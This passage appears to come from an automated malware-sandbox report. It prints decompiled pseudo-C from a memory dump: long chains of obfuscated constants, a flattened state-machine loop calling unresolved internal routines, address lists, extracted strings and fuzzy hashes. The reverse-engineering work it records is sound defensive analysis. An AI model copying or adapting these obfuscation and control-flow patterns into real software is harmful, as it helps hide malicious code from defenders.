				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				void* _t933;
				void* _t936;
				intOrPtr _t943;
				void* _t964;
				void* _t1012;
				void* _t1033;
				intOrPtr _t1035;
				void* _t1036;
				void* _t1041;
				signed int* _t1043;
				void* _t1047;

				_t1043 =  &_v420;
				_v256 = 0x4f9c4a;
				_v256 = _v256 * 0x68;
				_t1041 = 0;
				_t906 = 0xbe90c6a;
				_v72 = __ecx;
				_t912 = 0x7e;
				_v256 = _v256 / _t912;
				_v256 = _v256 ^ 0x4d03f198;
				_v364 = 0x177763;
				_v364 = _v364 + 0xffff64bb;
				_v364 = _v364 + 0xe006;
				_v364 = _v364 | 0x5810e9ef;
				_v364 = _v364 ^ 0x5817fdee;
				_v184 = 0xd17429;
				_v184 = _v184 >> 0xc;
				_v184 = _v184 ^ 0x00000d17;
				_v276 = 0x9cacd1;
				_v276 = _v276 | 0xea53a564;
				_t913 = 0x32;
				_v276 = _v276 * 0x12;
				_v276 = _v276 ^ 0x83ba3b3a;
				_v96 = 0xaecd02;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00005766;
				_v112 = 0x8c5899;
				_v112 = _v112 << 7;
				_v112 = _v112 ^ 0x462c4c80;
				_v292 = 0xa344d1;
				_v292 = _v292 ^ 0xc3a33b62;
				_v292 = _v292 >> 0xb;
				_v292 = _v292 ^ 0x0018600f;
				_v404 = 0x1a34bd;
				_v404 = _v404 / _t913;
				_t914 = 0x5c;
				_v404 = _v404 * 0x44;
				_v404 = _v404 ^ 0xb4a1f647;
				_v404 = _v404 ^ 0xb48255f7;
				_v156 = 0xeafd99;
				_v156 = _v156 ^ 0x78d68cc4;
				_v156 = _v156 ^ 0x783c715d;
				_v224 = 0x8d6eca;
				_v224 = _v224 + 0xffff086d;
				_v224 = _v224 << 9;
				_v224 = _v224 ^ 0x18ee6e00;
				_v332 = 0xc8bb61;
				_v332 = _v332 | 0x502870a4;
				_v332 = _v332 ^ 0xadb60793;
				_v332 = _v332 / _t914;
				_v332 = _v332 ^ 0x02c1084f;
				_v316 = 0xc820aa;
				_v316 = _v316 << 0xb;
				_v316 = _v316 + 0xb3c5;
				_v316 = _v316 << 0xf;
				_v316 = _v316 ^ 0x01e28000;
				_v356 = 0x969b2a;
				_v356 = _v356 >> 7;
				_v356 = _v356 >> 0xf;
				_t915 = 0x6b;
				_v356 = _v356 / _t915;
				_v356 = _v356 ^ 0x00000020;
				_v84 = 0xf2d01e;
				_v84 = _v84 ^ 0x2e4ac247;
				_v84 = _v84 ^ 0x2ebb6aea;
				_v144 = 0x74b502;
				_v144 = _v144 << 0xb;
				_v144 = _v144 ^ 0xa5a8359a;
				_v104 = 0x21a83d;
				_v104 = _v104 ^ 0x216ff468;
				_v104 = _v104 ^ 0x2146570e;
				_v220 = 0xb21177;
				_v220 = _v220 >> 2;
				_v220 = _v220 ^ 0x31fb2637;
				_v220 = _v220 ^ 0x31de94da;
				_v284 = 0x1ac8ae;
				_t916 = 0x2e;
				_v284 = _v284 * 0x56;
				_v284 = _v284 ^ 0x0f377588;
				_v284 = _v284 ^ 0x07c7370c;
				_v384 = 0x8eb0ef;
				_v384 = _v384 ^ 0x44be37ca;
				_v384 = _v384 << 7;
				_v384 = _v384 + 0xf6fc;
				_v384 = _v384 ^ 0x184fc2e2;
				_v376 = 0xa77a1b;
				_v376 = _v376 + 0x8c24;
				_v376 = _v376 | 0x82392e71;
				_v376 = _v376 << 6;
				_v376 = _v376 ^ 0xae40acf4;
				_v236 = 0xebcdd9;
				_v236 = _v236 + 0xffff32a9;
				_v236 = _v236 / _t916;
				_v236 = _v236 ^ 0x0004a748;
				_v136 = 0x23cd97;
				_t917 = 0x4c;
				_v136 = _v136 / _t917;
				_v136 = _v136 ^ 0x000f4235;
				_v320 = 0x4d819e;
				_v320 = _v320 + 0xffff59a4;
				_t918 = 0x45;
				_v320 = _v320 / _t918;
				_v320 = _v320 + 0xffff3895;
				_v320 = _v320 ^ 0x0001c602;
				_v344 = 0xb4c6e0;
				_v344 = _v344 >> 0x10;
				_v344 = _v344 + 0x799f;
				_v344 = _v344 + 0xffffbc81;
				_v344 = _v344 ^ 0x0002d9ef;
				_v128 = 0x4f54de;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 ^ 0x00053c32;
				_v268 = 0x176356;
				_v268 = _v268 >> 3;
				_v268 = _v268 * 0x1d;
				_v268 = _v268 ^ 0x005f9f9a;
				_v260 = 0x1003dd;
				_v260 = _v260 >> 5;
				_v260 = _v260 >> 0xf;
				_v260 = _v260 ^ 0x0004fa47;
				_v192 = 0xf049bd;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x000ebb9c;
				_v204 = 0x77f092;
				_v204 = _v204 ^ 0x0888cc2a;
				_v204 = _v204 * 0xa;
				_v204 = _v204 ^ 0x59f833f3;
				_v120 = 0xc39394;
				_v120 = _v120 ^ 0xa5000bf8;
				_v120 = _v120 ^ 0xa5cbd510;
				_v280 = 0x16f38f;
				_v280 = _v280 ^ 0xb7b39911;
				_v280 = _v280 << 5;
				_v280 = _v280 ^ 0xf4ae8a62;
				_v416 = 0xc8df40;
				_v416 = _v416 + 0xffff9a73;
				_v416 = _v416 << 2;
				_v416 = _v416 + 0xde3e;
				_v416 = _v416 ^ 0x032ae0c4;
				_v408 = 0xb6b7dc;
				_v408 = _v408 | 0x1d048797;
				_v408 = _v408 ^ 0x94b64be8;
				_v408 = _v408 ^ 0x890ec1b7;
				_v88 = 0x71711;
				_v88 = _v88 << 0xb;
				_v88 = _v88 ^ 0x38b17380;
				_v328 = 0x6aef7d;
				_v328 = _v328 | 0x3603473e;
				_v328 = _v328 << 9;
				_v328 = _v328 >> 3;
				_v328 = _v328 ^ 0x1af8f484;
				_v176 = 0x792835;
				_v176 = _v176 >> 1;
				_v176 = _v176 ^ 0x0036a652;
				_v252 = 0x9468d7;
				_v252 = _v252 + 0x7830;
				_v252 = _v252 ^ 0xd0ee3c59;
				_v252 = _v252 ^ 0xd072a278;
				_v196 = 0xd921a2;
				_v196 = _v196 + 0xffff3880;
				_v196 = _v196 ^ 0x00d95c51;
				_v212 = 0x870085;
				_t919 = 0x69;
				_v212 = _v212 / _t919;
				_t920 = 0x78;
				_v212 = _v212 * 0x2e;
				_v212 = _v212 ^ 0x003b57a7;
				_v160 = 0x2d1808;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xa3079107;
				_v400 = 0xdd20ad;
				_v400 = _v400 << 1;
				_v400 = _v400 + 0xff0c;
				_v400 = _v400 / _t920;
				_v400 = _v400 ^ 0x0009d535;
				_v168 = 0xb5e108;
				_t921 = 0x28;
				_v168 = _v168 * 0x7e;
				_v168 = _v168 ^ 0x598f807d;
				_v100 = 0xcc7cfc;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x019cfda6;
				_v360 = 0x2020d1;
				_v360 = _v360 / _t921;
				_v360 = _v360 ^ 0xa4368d26;
				_v360 = _v360 + 0xffff6dea;
				_v360 = _v360 ^ 0xa439a72f;
				_v300 = 0x9a8970;
				_v300 = _v300 + 0x6ac3;
				_v300 = _v300 ^ 0xdf533136;
				_v300 = _v300 ^ 0xdfcc7ab7;
				_v336 = 0x4d2f66;
				_v336 = _v336 ^ 0xb8468911;
				_v336 = _v336 >> 9;
				_t922 = 0x2c;
				_v336 = _v336 / _t922;
				_v336 = _v336 ^ 0x0008a1e2;
				_v152 = 0x8d8bb4;
				_v152 = _v152 + 0xf34a;
				_v152 = _v152 ^ 0x0088ea9a;
				_v92 = 0xebdf2a;
				_v92 = _v92 + 0x1fc0;
				_v92 = _v92 ^ 0x00e0ef1e;
				_v244 = 0xde57cd;
				_t923 = 0x5e;
				_v244 = _v244 * 0x51;
				_v244 = _v244 << 1;
				_v244 = _v244 ^ 0x8cb9eb22;
				_v352 = 0x84200;
				_v352 = _v352 >> 7;
				_v352 = _v352 + 0x9bd1;
				_v352 = _v352 | 0xc56dbf5a;
				_v352 = _v352 ^ 0xc568fd6f;
				_v392 = 0x204a7e;
				_t391 =  &_v392; // 0x204a7e
				_v392 =  *_t391 * 0x7e;
				_v392 = _v392 + 0xdaeb;
				_v392 = _v392 | 0x2df721c0;
				_v392 = _v392 ^ 0x2ffae543;
				_v172 = 0x96349f;
				_v172 = _v172 + 0xffff1d8a;
				_v172 = _v172 ^ 0x0098dfc1;
				_v296 = 0x3cde35;
				_v296 = _v296 * 0x41;
				_v296 = _v296 + 0xffff7ce3;
				_v296 = _v296 ^ 0x0f755d51;
				_v180 = 0xa031bd;
				_v180 = _v180 + 0xa275;
				_v180 = _v180 ^ 0x00a7d974;
				_v272 = 0xb7c84a;
				_v272 = _v272 / _t923;
				_v272 = _v272 | 0xd44a22c1;
				_v272 = _v272 ^ 0xd440a7e0;
				_v312 = 0xb76f0b;
				_t924 = 0x54;
				_v312 = _v312 / _t924;
				_v312 = _v312 ^ 0x75c1d9a4;
				_v312 = _v312 ^ 0x75cdcef1;
				_v396 = 0x8eadc4;
				_v396 = _v396 | 0x5ef2844f;
				_t925 = 0x37;
				_v396 = _v396 * 0x70;
				_v396 = _v396 | 0xb52ece17;
				_v396 = _v396 ^ 0xbf68d27f;
				_v412 = 0xed4711;
				_v412 = _v412 / _t925;
				_t926 = 0x64;
				_v412 = _v412 / _t926;
				_v412 = _v412 << 6;
				_v412 = _v412 ^ 0x00074caa;
				_v164 = 0x9f0f24;
				_v164 = _v164 << 0x10;
				_v164 = _v164 ^ 0x0f2a873f;
				_v288 = 0x8fa230;
				_v288 = _v288 + 0xf8b3;
				_v288 = _v288 + 0xffff5eba;
				_v288 = _v288 ^ 0x0084fab5;
				_v264 = 0x25d466;
				_v264 = _v264 ^ 0xc8fa4bab;
				_v264 = _v264 << 0xd;
				_v264 = _v264 ^ 0xf3f19765;
				_v388 = 0xa70662;
				_v388 = _v388 ^ 0x76435d5f;
				_v388 = _v388 ^ 0xce62b89b;
				_t927 = 0xd;
				_v388 = _v388 / _t927;
				_v388 = _v388 ^ 0x0e3f124f;
				_v148 = 0x6ec34e;
				_t928 = 0x39;
				_v148 = _v148 * 0x4b;
				_v148 = _v148 ^ 0x207f0473;
				_v420 = 0x5b05ef;
				_v420 = _v420 * 0x25;
				_v420 = _v420 >> 6;
				_v420 = _v420 * 0x7c;
				_v420 = _v420 ^ 0x1974bb04;
				_v368 = 0x435f28;
				_v368 = _v368 + 0xffffc274;
				_v368 = _v368 * 0x6e;
				_v368 = _v368 | 0xd65eea1e;
				_v368 = _v368 ^ 0xded0429e;
				_v304 = 0x93c507;
				_v304 = _v304 << 7;
				_v304 = _v304 << 1;
				_v304 = _v304 ^ 0x93c7b412;
				_v372 = 0x3ab09e;
				_v372 = _v372 / _t928;
				_v372 = _v372 + 0x9840;
				_v372 = _v372 << 5;
				_v372 = _v372 ^ 0x003f3225;
				_v140 = 0xe0922e;
				_t929 = 0x35;
				_v140 = _v140 / _t929;
				_v140 = _v140 ^ 0x000de06a;
				_v380 = 0x9cee9c;
				_v380 = _v380 >> 7;
				_v380 = _v380 ^ 0x8b8b39e1;
				_v380 = _v380 | 0xd3725c45;
				_v380 = _v380 ^ 0xdbf3b506;
				_v124 = 0x14c858;
				_v124 = _v124 >> 5;
				_v124 = _v124 ^ 0x0005cb8b;
				_v340 = 0xcdac83;
				_v340 = _v340 << 0xc;
				_v340 = _v340 + 0xffff54ea;
				_v340 = _v340 * 0x4c;
				_v340 = _v340 ^ 0xf33e9117;
				_v232 = 0x8765f2;
				_v232 = _v232 + 0xffffd3a6;
				_v232 = _v232 ^ 0xbeaac7fe;
				_v232 = _v232 ^ 0xbe2d6bbf;
				_v240 = 0x74f089;
				_t1033 = 0x5cbacf6;
				_v240 = _v240 / _t929;
				_v240 = _v240 + 0xe71;
				_t1036 = 0xb521822;
				_v240 = _v240 ^ 0x0001dcb0;
				_v132 = 0x92ec18;
				_v132 = _v132 | 0xb5e13100;
				_v132 = _v132 ^ 0xb5fff93b;
				_v248 = 0x8e7a84;
				_t930 = 0x73;
				_v248 = _v248 / _t930;
				_v248 = _v248 >> 0xa;
				_v248 = _v248 ^ 0x0002468b;
				_v348 = 0x178165;
				_v348 = _v348 >> 0xa;
				_v348 = _v348 ^ 0xbf9cbca8;
				_v348 = _v348 ^ 0x63b24424;
				_v348 = _v348 ^ 0xdc254682;
				_v216 = 0xca158b;
				_t931 = 0x24;
				_v216 = _v216 * 0x6c;
				_v216 = _v216 + 0xffffa472;
				_v216 = _v216 ^ 0x5540f783;
				_v108 = 0x25d03d;
				_v108 = _v108 + 0x8456;
				_v108 = _v108 ^ 0x0026e62d;
				_v116 = 0x466460;
				_v116 = _v116 >> 0xc;
				_v116 = _v116 ^ 0x00061b51;
				_v188 = 0x2458d2;
				_v188 = _v188 + 0xbdd1;
				_v188 = _v188 ^ 0x002ec5b3;
				_v308 = 0x164457;
				_v308 = _v308 ^ 0x6f362586;
				_v308 = _v308 << 0xc;
				_v308 = _v308 ^ 0x061164e6;
				_v228 = 0xcf6c57;
				_v228 = _v228 | 0x3a05c2af;
				_v228 = _v228 << 5;
				_v228 = _v228 ^ 0x59fbbcc5;
				_v200 = 0xeb4a20;
				_t651 =  &_v200; // 0xeb4a20
				_v200 =  *_t651 / _t931;
				_v200 = _v200 >> 6;
				_v200 = _v200 ^ 0x000523f8;
				_v324 = 0xe1c19f;
				_v324 = _v324 ^ 0x6d349ec6;
				_v324 = _v324 + 0x697d;
				_v324 = _v324 ^ 0xf263d816;
				_v324 = _v324 ^ 0x9fb84d00;
				_v208 = 0x55635;
				_t932 = 0x1c;
				_v208 = _v208 / _t932;
				_v208 = _v208 * 0x2b;
				_v208 = _v208 ^ 0x000a980b;
				while(1) {
					L1:
					_t1012 = 0xd88e65a;
					_t933 = 0x5074933;
					_t861 = 0x8738794;
					do {
						while(1) {
							L2:
							_t1047 = _t906 - _t861;
							if(_t1047 <= 0) {
								break;
							}
							__eflags = _t906 - _t1036;
							if(__eflags == 0) {
								_push(_v380);
								_t862 = E01043F5C(_v372, _v140, __eflags);
								_t936 = 0x1041180;
								_t1037 = _t862;
								_v44 = _v256;
								_v40 = _v364;
								_v36 = _v356;
								_t869 = E01060A43( *0x1066048 + 0x20, _v124,  *((intOrPtr*)( *0x1066048 + 0x68)), _t862, _v340, _v224, _v232, _t936,  &_v44, _t936, _v240, _v132, _v248, _v348,  *((intOrPtr*)( *0x1066048 + 0x64)), _v80);
								_t1043 =  &(_t1043[0xe]);
								__eflags = _t869 - _v332;
								if(_t869 != _v332) {
									_t906 = 0x2b3d0f8;
								} else {
									_t906 = _t1033;
									_t1041 = 1;
								}
								E01060352(_v216, _v108, _t1037, _v116);
								L24:
								_t1012 = 0xd88e65a;
								_t933 = 0x5074933;
								_t1036 = 0xb521822;
								_t861 = 0x8738794;
								goto L25;
							}
							__eflags = _t906 - 0xbe90c6a;
							if(__eflags == 0) {
								_t906 = 0x3f3ad8a;
								continue;
							}
							__eflags = _t906 - _t1012;
							if(__eflags != 0) {
								goto L25;
							}
							_push(_v180);
							_t872 = E01043F5C(_v172, _v296, __eflags);
							_t964 = 0x10410a0;
							__eflags = E010555BD( &_v76,  *0x1066048 + 0x68, _t872, _v272, _t964, _v80, _v312, _v396, _v404, _v412, _v164, _v288) - _v156;
							_t906 =  ==  ? 0x8738794 : _t1033;
							E01060352(_v264, _v388, _t872, _v148);
							_t1043 =  &(_t1043[0xc]);
							goto L24;
						}
						if(_t1047 == 0) {
							_push(_t933);
							_t943 = E0104F38A( *((intOrPtr*)( *0x1066048 + 0x68)));
							__eflags = _t943;
							_t906 =  !=  ? _t1036 : _t1033;
							 *((intOrPtr*)( *0x1066048 + 0x64)) = _t943;
							while(1) {
								L1:
								_t1012 = 0xd88e65a;
								_t933 = 0x5074933;
								_t861 = 0x8738794;
								goto L2;
							}
						}
						if(_t906 == 0x2b3d0f8) {
							E01042043( *((intOrPtr*)( *0x1066048 + 0x64)), _v188, _v308, _v228);
							_t906 = _t1033;
							goto L1;
						}
						if(_t906 == 0x3f3ad8a) {
							_push(_v104);
							_push(0x1041120);
							_t884 = E01043F5C(_v84, _v144, __eflags);
							_push(_v384);
							_push(0x1041030);
							__eflags = E010554FD(_v376,  &_v80, _t884, _v236, _v136, _v276, _v320, E01043F5C(_v220, _v284, __eflags)) - _v96;
							_t906 =  ==  ? 0x5074933 : 0x6145fc;
							E01060352(_v344, _v128, _t884, _v268);
							E01060352(_v260, _v192, _t885, _v204);
							_t1043 =  &(_t1043[0xe]);
							L11:
							_t1033 = 0x5cbacf6;
							goto L24;
						}
						if(_t906 == _t933) {
							_push(_v416);
							_push(0x1041070);
							_t891 = E01043F5C(_v120, _v280, __eflags);
							_push(_v328);
							_t1035 = _t891;
							_push(0x1041100);
							_t892 = E01043F5C(_v408, _v88, __eflags);
							_v64 = _v184;
							_t894 = E0105F6D3(_v176, _v252, _v196, _t1035);
							_v56 = _v56 & 0x00000000;
							_v60 = _t1035;
							_v68 = 2 + _t894 * 2;
							_v48 =  &_v68;
							_t897 = 0x20;
							_v76 = _t897;
							_v52 = 1;
							__eflags = E0104D9C6(_v72,  &_v32, _v212, _v160, _v112, _t892, _v400,  &_v76, _v168, _v100,  &_v56, _t897, _v360, _v300) - _v292;
							_t906 =  ==  ? 0xd88e65a : 0x5cbacf6;
							E01060352(_v336, _v152, _t1035, _v92);
							E01060352(_v244, _v352, _t892, _v392);
							_t1043 =  &(_t1043[0x16]);
							goto L11;
						}
						if(_t906 != _t1033) {
							goto L25;
						}
						E01042153(_v316, _v200, _v324, _v80, _v208);
						L9:
						return _t1041;
						L25:
						__eflags = _t906 - 0x6145fc;
					} while (__eflags != 0);
					goto L9;
				}
			}

0x0104758f
0x01047595
0x010475ae
0x010475b5
0x010475be
0x010475c5
0x010475cc
0x010475d1
0x010475da
0x010475e5
0x010475ed
0x010475f5
0x010475fd
0x01047605
0x0104760d
0x01047618
0x01047620
0x0104762b
0x01047636
0x01047649
0x0104764c
0x01047653
0x0104765e
0x01047669
0x01047671
0x0104767c
0x01047687
0x0104768f
0x0104769a
0x010476a5
0x010476b0
0x010476b8
0x010476c3
0x010476d3
0x010476dc
0x010476df
0x010476e3
0x010476eb
0x010476f3
0x010476fe
0x01047709
0x01047714
0x0104771f
0x0104772a
0x01047732
0x0104773d
0x01047745
0x0104774d
0x0104775d
0x01047761
0x01047769
0x01047771
0x01047776
0x0104777e
0x01047783
0x0104778b
0x01047793
0x01047798
0x010477a1
0x010477a4
0x010477aa
0x010477af
0x010477ba
0x010477c5
0x010477d0
0x010477db
0x010477e3
0x010477ee
0x010477f9
0x01047804
0x0104780f
0x0104781a
0x01047822
0x0104782d
0x01047838
0x0104784d
0x01047850
0x01047857
0x01047862
0x0104786d
0x01047875
0x0104787d
0x01047882
0x0104788a
0x01047892
0x0104789a
0x010478a2
0x010478aa
0x010478af
0x010478b7
0x010478c2
0x010478d8
0x010478df
0x010478ea
0x010478fc
0x01047901
0x0104790a
0x01047915
0x0104791d
0x01047929
0x0104792c
0x01047930
0x01047938
0x01047940
0x01047948
0x0104794d
0x01047955
0x0104795d
0x01047965
0x01047970
0x01047978
0x01047983
0x0104798e
0x0104799e
0x010479a5
0x010479b0
0x010479bb
0x010479c3
0x010479cb
0x010479d6
0x010479e1
0x010479e9
0x010479f4
0x010479ff
0x01047a12
0x01047a19
0x01047a26
0x01047a31
0x01047a3c
0x01047a47
0x01047a52
0x01047a5d
0x01047a65
0x01047a70
0x01047a78
0x01047a80
0x01047a85
0x01047a8d
0x01047a95
0x01047a9d
0x01047aad
0x01047ab5
0x01047abd
0x01047ac8
0x01047ad0
0x01047adb
0x01047ae3
0x01047aeb
0x01047af0
0x01047af5
0x01047afd
0x01047b08
0x01047b0f
0x01047b1a
0x01047b25
0x01047b30
0x01047b3b
0x01047b46
0x01047b51
0x01047b5c
0x01047b67
0x01047b7b
0x01047b80
0x01047b91
0x01047b94
0x01047b9b
0x01047ba6
0x01047bb1
0x01047bb9
0x01047bc4
0x01047bcc
0x01047bd0
0x01047be0
0x01047be4
0x01047bec
0x01047bff
0x01047c00
0x01047c07
0x01047c12
0x01047c1d
0x01047c24
0x01047c2f
0x01047c3d
0x01047c41
0x01047c49
0x01047c51
0x01047c59
0x01047c64
0x01047c6f
0x01047c7a
0x01047c85
0x01047c8f
0x01047c97
0x01047ca2
0x01047ca7
0x01047cad
0x01047cb5
0x01047cc0
0x01047ccb
0x01047cd6
0x01047ce1
0x01047cec
0x01047cf7
0x01047d0a
0x01047d0d
0x01047d14
0x01047d1b
0x01047d26
0x01047d2e
0x01047d33
0x01047d3b
0x01047d43
0x01047d4b
0x01047d53
0x01047d58
0x01047d5c
0x01047d64
0x01047d6c
0x01047d74
0x01047d7f
0x01047d8a
0x01047d95
0x01047da8
0x01047daf
0x01047dba
0x01047dc5
0x01047dd0
0x01047ddb
0x01047de6
0x01047dfc
0x01047e03
0x01047e0e
0x01047e19
0x01047e2b
0x01047e30
0x01047e39
0x01047e44
0x01047e4f
0x01047e57
0x01047e64
0x01047e67
0x01047e6b
0x01047e73
0x01047e7b
0x01047e8b
0x01047e93
0x01047e96
0x01047e9a
0x01047e9f
0x01047ea9
0x01047eb4
0x01047ebc
0x01047ec7
0x01047ed2
0x01047edd
0x01047ee8
0x01047ef3
0x01047efe
0x01047f09
0x01047f11
0x01047f1c
0x01047f24
0x01047f2c
0x01047f3a
0x01047f3f
0x01047f45
0x01047f4d
0x01047f60
0x01047f63
0x01047f6a
0x01047f75
0x01047f82
0x01047f86
0x01047f90
0x01047f94
0x01047f9c
0x01047fa4
0x01047fb1
0x01047fb5
0x01047fbd
0x01047fc5
0x01047fd0
0x01047fd8
0x01047fdf
0x01047fea
0x01047ffa
0x01047ffe
0x01048006
0x0104800b
0x01048013
0x01048025
0x01048028
0x0104802f
0x0104803a
0x01048042
0x01048047
0x0104804f
0x01048057
0x0104805f
0x0104806a
0x01048072
0x0104807d
0x01048085
0x0104808a
0x01048097
0x0104809b
0x010480a3
0x010480ae
0x010480b9
0x010480c4
0x010480cf
0x010480e3
0x010480ec
0x010480f5
0x01048100
0x01048105
0x01048110
0x0104811b
0x01048126
0x01048131
0x01048143
0x01048148
0x01048151
0x01048159
0x01048164
0x0104816c
0x01048171
0x01048179
0x01048181
0x01048189
0x0104819c
0x0104819f
0x010481a6
0x010481b1
0x010481bc
0x010481c7
0x010481d2
0x010481dd
0x010481e8
0x010481f0
0x010481fb
0x01048206
0x01048211
0x0104821c
0x01048227
0x01048232
0x0104823a
0x01048245
0x01048250
0x0104825b
0x01048263
0x0104826e
0x01048279
0x01048284
0x0104828b
0x01048293
0x0104829e
0x010482a6
0x010482ae
0x010482b6
0x010482be
0x010482c6
0x010482d8
0x010482db
0x010482ea
0x010482f1
0x010482fc
0x010482fc
0x010482fc
0x01048301
0x01048306
0x0104830b
0x0104830b
0x0104830b
0x0104830b
0x0104830d
0x00000000
0x00000000
0x010485e4
0x010485e6
0x010486a8
0x010486bc
0x010486c2
0x010486c3
0x010486cc
0x010486d7
0x010486e9
0x01048743
0x01048748
0x0104874b
0x0104874f
0x01048758
0x01048751
0x01048753
0x01048755
0x01048755
0x01048773
0x0104877a
0x0104877a
0x0104877f
0x01048784
0x01048789
0x00000000
0x01048789
0x010485ec
0x010485f2
0x0104869e
0x00000000
0x0104869e
0x010485f8
0x010485fa
0x00000000
0x00000000
0x01048600
0x0104861a
0x01048620
0x01048674
0x0104868d
0x01048691
0x01048696
0x00000000
0x01048696
0x01048313
0x010485c3
0x010485ce
0x010485d7
0x010485d9
0x010485dc
0x010482fc
0x010482fc
0x010482fc
0x01048301
0x01048306
0x00000000
0x01048306
0x010482fc
0x0104831f
0x010485a1
0x010485a8
0x00000000
0x010485a8
0x0104832b
0x010484c0
0x010484d5
0x010484da
0x010484df
0x010484f3
0x0104853b
0x01048557
0x0104855b
0x01048576
0x0104857b
0x010484b6
0x010484b6
0x00000000
0x010484b6
0x01048333
0x01048372
0x01048384
0x01048389
0x0104838e
0x01048399
0x0104839f
0x010483a4
0x010483c8
0x010483cf
0x010483e4
0x010483f3
0x010483fa
0x01048408
0x0104840f
0x01048417
0x01048422
0x0104847c
0x01048491
0x01048499
0x010484ae
0x010484b3
0x00000000
0x010484b3
0x01048337
0x00000000
0x00000000
0x0104835d
0x01048367
0x01048371
0x0104878e
0x0104878e
0x0104878e
0x00000000
0x0104879a

Strings

j, xrefs: 0104802F
~J , xrefs: 01047D53
fW, xrefs: 01047671
(_C, xrefs: 01047F9C
}i, xrefs: 010482AE
%2?, xrefs: 0104800B
`dF, xrefs: 010481DD
5(y, xrefs: 01047AFD
J, xrefs: 01048279
0x, xrefs: 01047B25
]q<x, xrefs: 01047709
}j, xrefs: 01047ADB
f/M, xrefs: 01047C85
, xrefs: 010477AA
-&, xrefs: 010481D2

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: $ J$%2?$(_C$-&$0x$5(y$]q<x$`dF$f/M$fW$j$}i$}j$~J
API String ID: 0-1192029311
Opcode ID: 378541958872ba11b5a0cad94079b0c10e989762df04e12d128495aa12be1c07
Instruction ID: d3a08cd099c1fec601cb4bccc0c2e3f8c5033c9f8879fb8af5dcd3ab39169716
Opcode Fuzzy Hash: 378541958872ba11b5a0cad94079b0c10e989762df04e12d128495aa12be1c07
Instruction Fuzzy Hash: 7A92E0B15093819FD3B9CF65C58AB8BBBE1BBC5304F10891DE2CA86260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0104EC27, Relevance: 17.8, Strings: 14, Instructions: 344
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0104EC27() {
				void* _t331;
				signed int _t335;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t348;
				void* _t356;
				signed int _t398;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t411;
				signed int* _t415;

				 *_t415 = 0x2ff1b4;
				 *_t415 =  *_t415 ^ 0xfb7fa6b0;
				_t356 = 0x7034cb8;
				 *_t415 =  *_t415 << 0xb;
				 *_t415 =  *_t415 + 0xffff0add;
				 *_t415 =  *_t415 ^ 0x82b72adc;
				_t415[0x14] = 0xbf0c8a;
				_t415[0x14] = _t415[0x14] ^ 0x006819fa;
				_t415[0x14] = _t415[0x14] << 1;
				_t415[0x14] = _t415[0x14] ^ 0x01ae2ae1;
				_t415[7] = 0x4b071f;
				_t415[7] = _t415[7] + 0xf3fd;
				_t415[0xb] = _t415[7] * 0x72;
				_t415[0xb] = _t415[0xb] + 0x6430;
				_t415[0xb] = _t415[0xb] ^ 0x21d636ab;
				_t415[0x19] = 0x60fe16;
				_t401 = 0x71;
				_t415[0x1a] = _t415[0x19] / _t401;
				_t415[0x1a] = _t415[0x1a] ^ 0xe1d295b7;
				_t415[0x1a] = _t415[0x1a] ^ 0xe1d72c2a;
				_t415[0x1e] = 0xef1996;
				_t415[0x1e] = _t415[0x1e] << 0x10;
				_t415[0x1e] = _t415[0x1e] ^ 0x1993fea0;
				_t415[0x16] = 0xfd2420;
				_t415[0x16] = _t415[0x16] << 0xc;
				_t415[0x16] = _t415[0x16] ^ 0x923e3d3c;
				_t415[0x16] = _t415[0x16] ^ 0x4078d4fe;
				_t415[0x23] = 0x506b21;
				_t415[0x23] = _t415[0x23] << 2;
				_t415[0x23] = _t415[0x23] ^ 0x0143b977;
				_t415[0x1c] = 0x53eeda;
				_t415[0x1c] = _t415[0x1c] >> 6;
				_t402 = 0x6b;
				_t415[0x1c] = _t415[0x1c] / _t402;
				_t415[0x1c] = _t415[0x1c] ^ 0x000e3127;
				_t415[9] = 0x7cf73b;
				_t415[9] = _t415[9] + 0xdf44;
				_t415[9] = _t415[9] ^ 0xb8aac642;
				_t403 = 0x62;
				_t415[0x24] = _t415[0x24] & 0x00000000;
				_t415[8] = _t415[9] / _t403;
				_t415[8] = _t415[8] ^ 0x01e7107a;
				_t415[0x1a] = 0xb1d3c8;
				_t404 = 0x32;
				_t415[0x1a] = _t415[0x1a] * 0x63;
				_t415[0x1a] = _t415[0x1a] + 0xffff41e1;
				_t415[0x1a] = _t415[0x1a] ^ 0x44c3ceda;
				_t415[0xf] = 0x67a0a3;
				_t415[0xf] = _t415[0xf] >> 5;
				_t415[0xf] = _t415[0xf] * 0x25;
				_t415[0xf] = _t415[0xf] + 0xffffd46f;
				_t415[0xf] = _t415[0xf] ^ 0x0079d095;
				_t415[0x20] = 0x939f69;
				_t415[0x20] = _t415[0x20] >> 9;
				_t415[0x20] = _t415[0x20] ^ 0x000645bf;
				_t415[0xd] = 0x6e98c3;
				_t415[0xd] = _t415[0xd] + 0x1b48;
				_t415[0xd] = _t415[0xd] / _t404;
				_t415[0xd] = _t415[0xd] + 0x30f9;
				_t415[0xd] = _t415[0xd] ^ 0x000343da;
				_t415[9] = 0xd47c54;
				_t405 = 0x11;
				_t415[0xa] = _t415[9] * 0x6b;
				_t415[0xa] = _t415[0xa] + 0x327b;
				_t415[0xa] = _t415[0xa] ^ 0x58de0f5c;
				_t415[0x14] = 0xbee5f4;
				_t415[0x14] = _t415[0x14] + 0x4a9a;
				_t415[0x14] = _t415[0x14] ^ 0xc7bb3bda;
				_t415[0x14] = _t415[0x14] ^ 0xc703792a;
				_t415[0x18] = 0x5f34c8;
				_t415[0x18] = _t415[0x18] >> 8;
				_t415[0x18] = _t415[0x18] + 0xdb9e;
				_t415[0x18] = _t415[0x18] ^ 0x000f0254;
				_t415[0x13] = 0x654d4c;
